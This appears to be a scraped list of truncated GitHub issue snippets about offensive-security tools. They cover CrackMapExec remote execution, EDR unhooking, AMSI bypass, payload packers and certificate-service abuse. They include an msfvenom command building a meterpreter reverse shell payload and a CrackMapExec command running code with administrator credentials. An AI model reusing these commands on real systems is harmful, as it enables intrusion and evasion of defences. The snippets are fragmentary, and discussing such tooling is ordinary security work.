-
This is more for documentation reasons but if you run the tool from the DC you get the following DCOM error:
![image](https://user-images.githubusercontent.com/13127116/165816256-643e2cea-a4e7-49fa…
-
## Command string used
`sudo crackmapexec smb 10.0.0.40 -u Administrator -p P@ssword! -X whoami`
## CME verbose output (using the --verbose flag)
```
┌──(kali㉿sysaggressr)-[~]
└─$ crackmapexec …
-
Easily reproduceable in my lab, very simple 2 DC, 2016 config level domain, linux (Kali) machine is in the same subnet
i tried replacing DC01.qlab.local with pretty much everything else i could thin…
-
### Describe the bug
Random crash to desktop. Occured in a closed friend session with my friend also using YimMenu. I think he spawned something when my game crashed.
### Steps To Reproduce
n/a
##…
-
Hey,
I'm trying to bypass the example https://github.com/CCob/SylantStrike .
The below is my code snipper using SharpUnhooker:
```
public class SUUsageExample{
.....
public static void Main()
…
-
**Describe the bug**
Permission denied error when run
**To Reproduce**
Steps to reproduce the behavior:
```batch
inceptor.py native HookDetector45.exe -o interceptor_test01.exe
[+] Native …
-
Hey,
First of all: nice work and project! 👍🏼 Keep it on.
For your information:
Your AMSI bypass in the PS1-file will not bypass `[System.Reflection.Assembly]::Load($bytearray)` triggers for t…
-
Hello!
I created a vbs payload using msfvenom:
`msfvenom -p windows/x64/meterpreter/reverse_http LHOST=10.10.10.10 LPORT=8080 EXITFUNC=thread -f vbs > foo.vbs`
Then:
`type foo.vbs | macro_pack…
-
When trying to use PEzor on a exe, it gives an error on calling donut:
```
od: /tmp/tmp.a9kqst7yVg/shellcode.bin.donut: No such file or directory
```
On https://github.com/phra/PEzor/blob/master…
dobin updated
2 years ago
-
When attemting to exploit ESC7 and the account I use for authentication does not have the right Manage Certificates, I must add that account as a new officer in order to grant the account that right. …